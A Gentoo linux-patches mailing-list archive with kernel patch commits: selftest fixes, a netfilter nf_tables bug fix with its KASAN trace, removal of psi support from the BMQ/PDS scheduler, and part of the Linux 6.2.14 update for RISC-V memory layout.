+index 1c5e90c632548..2d3c7c77ab6cb 100644
+--- a/tools/testing/selftests/resctrl/cat_test.c
++++ b/tools/testing/selftests/resctrl/cat_test.c
+@@ -40,7 +40,7 @@ static int cat_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	if (p->num_of_runs == 0) {
+ 		sprintf(schemata, "%lx", p->mask);
+diff --git a/tools/testing/selftests/resctrl/cmt_test.c b/tools/testing/selftests/resctrl/cmt_test.c
+index 8968e36db99d7..3b0454e7fc826 100644
+--- a/tools/testing/selftests/resctrl/cmt_test.c
++++ b/tools/testing/selftests/resctrl/cmt_test.c
+@@ -32,7 +32,7 @@ static int cmt_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (p->num_of_runs >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	p->num_of_runs++;
+ 
+diff --git a/tools/testing/selftests/resctrl/fill_buf.c b/tools/testing/selftests/resctrl/fill_buf.c
+index 56ccbeae0638d..c20d0a7ecbe63 100644
+--- a/tools/testing/selftests/resctrl/fill_buf.c
++++ b/tools/testing/selftests/resctrl/fill_buf.c
+@@ -68,6 +68,8 @@ static void *malloc_and_init_memory(size_t s)
+ 	size_t s64;
+ 
+ 	void *p = memalign(PAGE_SIZE, s);
++	if (!p)
++		return NULL;
+ 
+ 	p64 = (uint64_t *)p;
+ 	s64 = s / sizeof(uint64_t);
+diff --git a/tools/testing/selftests/resctrl/mba_test.c b/tools/testing/selftests/resctrl/mba_test.c
+index 1a1bdb6180cf2..97dc98c0c9497 100644
+--- a/tools/testing/selftests/resctrl/mba_test.c
++++ b/tools/testing/selftests/resctrl/mba_test.c
+@@ -28,6 +28,7 @@ static int mba_setup(int num, ...)
+ 	struct resctrl_val_param *p;
+ 	char allocation_str[64];
+ 	va_list param;
++	int ret;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+@@ -41,11 +42,15 @@ static int mba_setup(int num, ...)
+ 		return 0;
+ 
+ 	if (allocation < ALLOCATION_MIN || allocation > ALLOCATION_MAX)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	sprintf(allocation_str, "%d", allocation);
+ 
+-	write_schemata(p->ctrlgrp, allocation_str, p->cpu_no, p->resctrl_val);
++	ret = write_schemata(p->ctrlgrp, allocation_str, p->cpu_no,
++			     p->resctrl_val);
++	if (ret < 0)
++		return ret;
++
+ 	allocation -= ALLOCATION_STEP;
+ 
+ 	return 0;
+diff --git a/tools/testing/selftests/resctrl/mbm_test.c b/tools/testing/selftests/resctrl/mbm_test.c
+index 8392e5c55ed02..280187628054d 100644
+--- a/tools/testing/selftests/resctrl/mbm_test.c
++++ b/tools/testing/selftests/resctrl/mbm_test.c
+@@ -95,7 +95,7 @@ static int mbm_setup(int num, ...)
+ 
+ 	/* Run NUM_OF_RUNS times */
+ 	if (num_of_runs++ >= NUM_OF_RUNS)
+-		return -1;
++		return END_OF_TESTS;
+ 
+ 	va_start(param, num);
+ 	p = va_arg(param, struct resctrl_val_param *);
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index f0ded31fb3c7c..f44fa2de4d986 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -37,6 +37,8 @@
+ #define ARCH_INTEL     1
+ #define ARCH_AMD       2
+ 
++#define END_OF_TESTS	1
++
+ #define PARENT_EXIT(err_msg)			\
+ 	do {					\
+ 		perror(err_msg);		\
+diff --git a/tools/testing/selftests/resctrl/resctrl_val.c b/tools/testing/selftests/resctrl/resctrl_val.c
+index b32b96356ec70..00864242d76c6 100644
+--- a/tools/testing/selftests/resctrl/resctrl_val.c
++++ b/tools/testing/selftests/resctrl/resctrl_val.c
+@@ -734,29 +734,24 @@ int resctrl_val(char **benchmark_cmd, struct resctrl_val_param *param)
+ 
+ 	/* Test runs until the callback setup() tells the test to stop. */
+ 	while (1) {
++		ret = param->setup(1, param);
++		if (ret == END_OF_TESTS) {
++			ret = 0;
++			break;
++		}
++		if (ret < 0)
++			break;
++
+ 		if (!strncmp(resctrl_val, MBM_STR, sizeof(MBM_STR)) ||
+ 		    !strncmp(resctrl_val, MBA_STR, sizeof(MBA_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+-
+ 			ret = measure_vals(param, &bw_resc_start);
+ 			if (ret)
+ 				break;
+ 		} else if (!strncmp(resctrl_val, CMT_STR, sizeof(CMT_STR))) {
+-			ret = param->setup(1, param);
+-			if (ret) {
+-				ret = 0;
+-				break;
+-			}
+ 			sleep(1);
+ 			ret = measure_cache_vals(param, bm_pid);
+ 			if (ret)
+ 				break;
+-		} else {
+-			break;
+ 		}
+ 	}
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+index 8acb904d14193..3593fb8f79ad3 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/fq.json
+@@ -114,6 +114,28 @@
+             "$IP link del dev $DUMMY type dummy"
+         ]
+     },
++    {
++        "id": "10f7",
++        "name": "Create FQ with invalid initial_quantum setting",
++        "category": [
++            "qdisc",
++            "fq"
++        ],
++        "plugins": {
++            "requires": "nsPlugin"
++        },
++        "setup": [
++            "$IP link add dev $DUMMY type dummy || /bin/true"
++        ],
++        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root fq initial_quantum 0x80000000",
++        "expExitCode": "2",
++        "verifyCmd": "$TC qdisc show dev $DUMMY",
++        "matchPattern": "qdisc fq 1: root.*initial_quantum 2048Mb",
++        "matchCount": "0",
++        "teardown": [
++            "$IP link del dev $DUMMY type dummy"
++        ]
++    },
+     {
+         "id": "9398",
+         "name": "Create FQ with maxrate setting",
+diff --git a/tools/testing/selftests/user_events/ftrace_test.c b/tools/testing/selftests/user_events/ftrace_test.c
+index 404a2713dcae8..1bc26e6476fc3 100644
+--- a/tools/testing/selftests/user_events/ftrace_test.c
++++ b/tools/testing/selftests/user_events/ftrace_test.c
+@@ -294,6 +294,11 @@ TEST_F(user, write_events) {
+ 	ASSERT_NE(-1, writev(self->data_fd, (const struct iovec *)io, 3));
+ 	after = trace_bytes();
+ 	ASSERT_GT(after, before);
++
++	/* Negative index should fail with EINVAL */
++	reg.write_index = -1;
++	ASSERT_EQ(-1, writev(self->data_fd, (const struct iovec *)io, 3));
++	ASSERT_EQ(EINVAL, errno);
+ }
+ 
+ TEST_F(user, write_fault) {
+diff --git a/tools/verification/rv/src/rv.c b/tools/verification/rv/src/rv.c
+index e601cd9c411e1..1ddb855328165 100644
+--- a/tools/verification/rv/src/rv.c
++++ b/tools/verification/rv/src/rv.c
+@@ -74,7 +74,7 @@ static void rv_list(int argc, char **argv)
+ static void rv_mon(int argc, char **argv)
+ {
+ 	char *monitor_name;
+-	int i, run;
++	int i, run = 0;
+ 
+ 	static const char *const usage[] = {
+ 		"",


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-10 17:52 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-10 17:52 UTC (permalink / raw
  To: gentoo-commits

commit:     e2431152ce78342551aabb51d029f531c84aef57
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 17:48:27 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 17:48:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e2431152

netfilter: nf_tables: deactivate anonymous set from preparation phase

Bug: https://bugs.gentoo.org/90606

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 +
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 +++++++++++++++++++++
 2 files changed, 125 insertions(+)

diff --git a/0000_README b/0000_README
index 00341fe3..a1325df7 100644
--- a/0000_README
+++ b/0000_README
@@ -107,6 +107,10 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
+Patch:  1520_fs-enable-link-security-restrictions-by-default.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
+Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
+
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
new file mode 100644
index 00000000..cd75de5c
--- /dev/null
+++ b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
@@ -0,0 +1,121 @@
+From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
+From: Pablo Neira Ayuso <pablo@netfilter.org>
+Date: Tue, 2 May 2023 10:25:24 +0200
+Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
+
+Toggle deleted anonymous sets as inactive in the next generation, so
+users cannot perform any update on it. Clear the generation bitmask
+in case the transaction is aborted.
+
+The following KASAN splat shows a set element deletion for a bound
+anonymous set that has been already removed in the same transaction.
+
+[   64.921510] ==================================================================
+[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
+[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
+[   64.931120] Call Trace:
+[   64.932699]  <TASK>
+[   64.934292]  dump_stack_lvl+0x33/0x50
+[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.937551]  kasan_report+0xda/0x120
+[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
+[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
+[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
+[   64.945710]  ? kasan_set_track+0x21/0x30
+[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
+[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
+
+Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
+---
+ include/net/netfilter/nf_tables.h |  1 +
+ net/netfilter/nf_tables_api.c     | 12 ++++++++++++
+ net/netfilter/nft_dynset.c        |  2 +-
+ net/netfilter/nft_lookup.c        |  2 +-
+ net/netfilter/nft_objref.c        |  2 +-
+ 5 files changed, 16 insertions(+), 3 deletions(-)
+
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 3ed21d2d56590..2e24ea1d744c2 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -619,6 +619,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8b6c61a2196cb..59fb8320ab4d7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 274579b1696e0..bd19c7aec92ee 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cecf8ab90e58f..03ef4fdaa460b 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index cb37169608bab..a48dd5b5d45b1 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+-- 
+cgit 
+


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-05-10 16:08 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-05-10 16:08 UTC (permalink / raw
  To: gentoo-commits

commit:     0d62c0fdfda6ebc693ddcfb5841feb69c44391f7
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 10 16:04:51 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 10 16:04:51 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0d62c0fd

sched/alt: Remove psi support

Bug: https://bugs.gentoo.org/904514

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  4 ++
 5022_BMQ-and-PDS-remove-psi-support.patch | 94 +++++++++++++++++++++++++++++++
 2 files changed, 98 insertions(+)

diff --git a/0000_README b/0000_README
index d3c9fbfe..00341fe3 100644
--- a/0000_README
+++ b/0000_README
@@ -146,3 +146,7 @@ Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incl
 Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
 From:   https://gitweb.gentoo.org/proj/linux-patches.git/
 Desc:   Set defaults for BMQ. Add archs as people test, default to N
+
+Patch:  5022_BMQ-and-PDS-remove-psi-support.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Sched/alt: Remove psi support 

diff --git a/5022_BMQ-and-PDS-remove-psi-support.patch b/5022_BMQ-and-PDS-remove-psi-support.patch
new file mode 100644
index 00000000..4390e2d5
--- /dev/null
+++ b/5022_BMQ-and-PDS-remove-psi-support.patch
@@ -0,0 +1,94 @@
+From 542887ccaeadc65843ec171bccc87f8aa8bbca95 Mon Sep 17 00:00:00 2001
+From: Alfred Chen <cchalpha@gmail.com>
+Date: Wed, 26 Apr 2023 16:38:14 +0000
+Subject: [PATCH] sched/alt: Remove psi support
+
+There are issues(#70, #72, #79) with psi support. Removing the
+support of psi as it doesn't bring much gain.
+---
+ init/Kconfig             | 1 +
+ kernel/sched/alt_core.c  | 8 --------
+ kernel/sched/alt_sched.h | 1 -
+ 3 files changed, 1 insertion(+), 9 deletions(-)
+
+diff --git a/init/Kconfig b/init/Kconfig
+index 454f792df9dd..dff86592555a 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -629,6 +629,7 @@ config TASK_IO_ACCOUNTING
+ 
+ config PSI
+ 	bool "Pressure stall information tracking"
++	depends on !SCHED_ALT
+ 	help
+ 	  Collect metrics that indicate how overcommitted the CPU, memory,
+ 	  and IO capacity are in the system.
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+index af4d840d4bb7..37dfdc41d2a7 100644
+--- a/kernel/sched/alt_core.c
++++ b/kernel/sched/alt_core.c
+@@ -588,7 +588,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
+ 
+ 	rq->prev_irq_time += irq_delta;
+ 	delta -= irq_delta;
+-	psi_account_irqtime(rq->curr, irq_delta);
+ #endif
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+ 	if (static_key_false((&paravirt_steal_rq_enabled))) {
+@@ -769,7 +768,6 @@ unsigned long get_wchan(struct task_struct *p)
+  */
+ #define __SCHED_DEQUEUE_TASK(p, rq, flags, func)				\
+ 	sched_info_dequeue(rq, p);						\
+-	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
+ 										\
+ 	list_del(&p->sq_node);							\
+ 	if (list_empty(&rq->queue.heads[p->sq_idx])) { 				\
+@@ -779,7 +777,6 @@ unsigned long get_wchan(struct task_struct *p)
+ 
+ #define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
+ 	sched_info_enqueue(rq, p);					\
+-	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
+ 									\
+ 	p->sq_idx = task_sched_prio_idx(p, rq);				\
+ 	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
+@@ -2954,7 +2951,6 @@ static int try_to_wake_up(struct task_struct *p, unsigned int state,
+ 		}
+ 
+ 		wake_flags |= WF_MIGRATED;
+-		psi_ttwu_dequeue(p);
+ 		set_task_cpu(p, cpu);
+ 	}
+ #else
+@@ -4828,8 +4824,6 @@ static void __sched notrace __schedule(unsigned int sched_mode)
+ 		 */
+ 		++*switch_count;
+ 
+-		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
+-
+ 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
+ 
+ 		/* Also unlocks the rq: */
+@@ -7689,8 +7683,6 @@ void __init sched_init(void)
+ 	sched_init_topology_cpumask_early();
+ #endif /* SMP */
+ 
+-	psi_init();
+-
+ 	preempt_dynamic_init();
+ }
+ 
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+index 9fe45bf0cedf..55a15b806e87 100644
+--- a/kernel/sched/alt_sched.h
++++ b/kernel/sched/alt_sched.h
+@@ -3,7 +3,6 @@
+ 
+ #include <linux/context_tracking.h>
+ #include <linux/profile.h>
+-#include <linux/psi.h>
+ #include <linux/stop_machine.h>
+ #include <linux/syscalls.h>
+ #include <linux/tick.h>
+-- 
+GitLab
+


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-30 23:50 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-04-30 23:50 UTC (permalink / raw
  To: gentoo-commits

commit:     1630d83b829a06d7e27586ebfde8ec65657f37f3
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Sun Apr 30 23:50:27 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Sun Apr 30 23:50:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1630d83b

Linux patch 6.2.14

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |   4 +
 1013_linux-6.2.14.patch | 693 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 697 insertions(+)

diff --git a/0000_README b/0000_README
index bb52a583..d3c9fbfe 100644
--- a/0000_README
+++ b/0000_README
@@ -95,6 +95,10 @@ Patch:  1012_linux-6.2.13.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.13
 
+Patch:  1013_linux-6.2.14.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.14
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1013_linux-6.2.14.patch b/1013_linux-6.2.14.patch
new file mode 100644
index 00000000..8d950164
--- /dev/null
+++ b/1013_linux-6.2.14.patch
@@ -0,0 +1,693 @@
+diff --git a/Documentation/riscv/vm-layout.rst b/Documentation/riscv/vm-layout.rst
+index 3be44e74ec5d6..5462c84f4723f 100644
+--- a/Documentation/riscv/vm-layout.rst
++++ b/Documentation/riscv/vm-layout.rst
+@@ -47,7 +47,7 @@ RISC-V Linux Kernel SV39
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffffffc6fee00000 | -228    GB | ffffffc6feffffff |    2 MB | fixmap
++   ffffffc6fea00000 | -228    GB | ffffffc6feffffff |    6 MB | fixmap
+    ffffffc6ff000000 | -228    GB | ffffffc6ffffffff |   16 MB | PCI io
+    ffffffc700000000 | -228    GB | ffffffc7ffffffff |    4 GB | vmemmap
+    ffffffc800000000 | -224    GB | ffffffd7ffffffff |   64 GB | vmalloc/ioremap space
+@@ -83,7 +83,7 @@ RISC-V Linux Kernel SV48
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffff8d7ffee00000 |  -114.5 TB | ffff8d7ffeffffff |    2 MB | fixmap
++   ffff8d7ffea00000 |  -114.5 TB | ffff8d7ffeffffff |    6 MB | fixmap
+    ffff8d7fff000000 |  -114.5 TB | ffff8d7fffffffff |   16 MB | PCI io
+    ffff8d8000000000 |  -114.5 TB | ffff8f7fffffffff |    2 TB | vmemmap
+    ffff8f8000000000 |  -112.5 TB | ffffaf7fffffffff |   32 TB | vmalloc/ioremap space
+@@ -119,7 +119,7 @@ RISC-V Linux Kernel SV57
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ff1bfffffee00000 | -57     PB | ff1bfffffeffffff |    2 MB | fixmap
++   ff1bfffffea00000 | -57     PB | ff1bfffffeffffff |    6 MB | fixmap
+    ff1bffffff000000 | -57     PB | ff1bffffffffffff |   16 MB | PCI io
+    ff1c000000000000 | -57     PB | ff1fffffffffffff |    1 PB | vmemmap
+    ff20000000000000 | -56     PB | ff5fffffffffffff |   16 PB | vmalloc/ioremap space
+diff --git a/Makefile b/Makefile
+index f76a4a63aaf5a..031d40ad0bd9d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 13
++SUBLEVEL = 14
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/riscv/include/asm/fixmap.h b/arch/riscv/include/asm/fixmap.h
+index 5c3e7b97fcc6f..0a55099bb7349 100644
+--- a/arch/riscv/include/asm/fixmap.h
++++ b/arch/riscv/include/asm/fixmap.h
+@@ -22,6 +22,14 @@
+  */
+ enum fixed_addresses {
+ 	FIX_HOLE,
++	/*
++	 * The fdt fixmap mapping must be PMD aligned and will be mapped
++	 * using PMD entries in fixmap_pmd in 64-bit and a PGD entry in 32-bit.
++	 */
++	FIX_FDT_END,
++	FIX_FDT = FIX_FDT_END + FIX_FDT_SIZE / PAGE_SIZE - 1,
++
++	/* Below fixmaps will be mapped using fixmap_pte */
+ 	FIX_PTE,
+ 	FIX_PMD,
+ 	FIX_PUD,
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 6da0f3285dd2e..f1ef0c3f905a0 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -87,9 +87,13 @@
+ 
+ #define FIXADDR_TOP      PCI_IO_START
+ #ifdef CONFIG_64BIT
+-#define FIXADDR_SIZE     PMD_SIZE
++#define MAX_FDT_SIZE	 PMD_SIZE
++#define FIX_FDT_SIZE	 (MAX_FDT_SIZE + SZ_2M)
++#define FIXADDR_SIZE     (PMD_SIZE + FIX_FDT_SIZE)
+ #else
+-#define FIXADDR_SIZE     PGDIR_SIZE
++#define MAX_FDT_SIZE	 PGDIR_SIZE
++#define FIX_FDT_SIZE	 MAX_FDT_SIZE
++#define FIXADDR_SIZE     (PGDIR_SIZE + FIX_FDT_SIZE)
+ #endif
+ #define FIXADDR_START    (FIXADDR_TOP - FIXADDR_SIZE)
+ 
+diff --git a/arch/riscv/kernel/setup.c b/arch/riscv/kernel/setup.c
+index 86acd690d5293..2acf51c235673 100644
+--- a/arch/riscv/kernel/setup.c
++++ b/arch/riscv/kernel/setup.c
+@@ -278,12 +278,8 @@ void __init setup_arch(char **cmdline_p)
+ #if IS_ENABLED(CONFIG_BUILTIN_DTB)
+ 	unflatten_and_copy_device_tree();
+ #else
+-	if (early_init_dt_verify(__va(XIP_FIXUP(dtb_early_pa))))
+-		unflatten_device_tree();
+-	else
+-		pr_err("No DTB found in kernel mappings\n");
++	unflatten_device_tree();
+ #endif
+-	early_init_fdt_scan_reserved_mem();
+ 	misc_mem_init();
+ 
+ 	init_resources();
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 478d6763a01a1..0f14f4a8d179a 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -57,7 +57,6 @@ unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)]
+ EXPORT_SYMBOL(empty_zero_page);
+ 
+ extern char _start[];
+-#define DTB_EARLY_BASE_VA      PGDIR_SIZE
+ void *_dtb_early_va __initdata;
+ uintptr_t _dtb_early_pa __initdata;
+ 
+@@ -236,31 +235,22 @@ static void __init setup_bootmem(void)
+ 	set_max_mapnr(max_low_pfn - ARCH_PFN_OFFSET);
+ 
+ 	reserve_initrd_mem();
++
++	/*
++	 * No allocation should be done before reserving the memory as defined
++	 * in the device tree, otherwise the allocation could end up in a
++	 * reserved region.
++	 */
++	early_init_fdt_scan_reserved_mem();
++
+ 	/*
+ 	 * If DTB is built in, no need to reserve its memblock.
+ 	 * Otherwise, do reserve it but avoid using
+ 	 * early_init_fdt_reserve_self() since __pa() does
+ 	 * not work for DTB pointers that are fixmap addresses
+ 	 */
+-	if (!IS_ENABLED(CONFIG_BUILTIN_DTB)) {
+-		/*
+-		 * In case the DTB is not located in a memory region we won't
+-		 * be able to locate it later on via the linear mapping and
+-		 * get a segfault when accessing it via __va(dtb_early_pa).
+-		 * To avoid this situation copy DTB to a memory region.
+-		 * Note that memblock_phys_alloc will also reserve DTB region.
+-		 */
+-		if (!memblock_is_memory(dtb_early_pa)) {
+-			size_t fdt_size = fdt_totalsize(dtb_early_va);
+-			phys_addr_t new_dtb_early_pa = memblock_phys_alloc(fdt_size, PAGE_SIZE);
+-			void *new_dtb_early_va = early_memremap(new_dtb_early_pa, fdt_size);
+-
+-			memcpy(new_dtb_early_va, dtb_early_va, fdt_size);
+-			early_memunmap(new_dtb_early_va, fdt_size);
+-			_dtb_early_pa = new_dtb_early_pa;
+-		} else
+-			memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+-	}
++	if (!IS_ENABLED(CONFIG_BUILTIN_DTB))
++		memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+ 
+ 	dma_contiguous_reserve(dma32_phys_limit);
+ 	if (IS_ENABLED(CONFIG_64BIT))
+@@ -279,9 +269,6 @@ pgd_t trampoline_pg_dir[PTRS_PER_PGD] __page_aligned_bss;
+ static pte_t fixmap_pte[PTRS_PER_PTE] __page_aligned_bss;
+ 
+ pgd_t early_pg_dir[PTRS_PER_PGD] __initdata __aligned(PAGE_SIZE);
+-static p4d_t __maybe_unused early_dtb_p4d[PTRS_PER_P4D] __initdata __aligned(PAGE_SIZE);
+-static pud_t __maybe_unused early_dtb_pud[PTRS_PER_PUD] __initdata __aligned(PAGE_SIZE);
+-static pmd_t __maybe_unused early_dtb_pmd[PTRS_PER_PMD] __initdata __aligned(PAGE_SIZE);
+ 
+ #ifdef CONFIG_XIP_KERNEL
+ #define pt_ops			(*(struct pt_alloc_ops *)XIP_FIXUP(&pt_ops))
+@@ -626,9 +613,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define trampoline_pgd_next	(pgtable_l5_enabled ?			\
+ 		(uintptr_t)trampoline_p4d : (pgtable_l4_enabled ?	\
+ 		(uintptr_t)trampoline_pud : (uintptr_t)trampoline_pmd))
+-#define early_dtb_pgd_next	(pgtable_l5_enabled ?			\
+-		(uintptr_t)early_dtb_p4d : (pgtable_l4_enabled ?	\
+-		(uintptr_t)early_dtb_pud : (uintptr_t)early_dtb_pmd))
+ #else
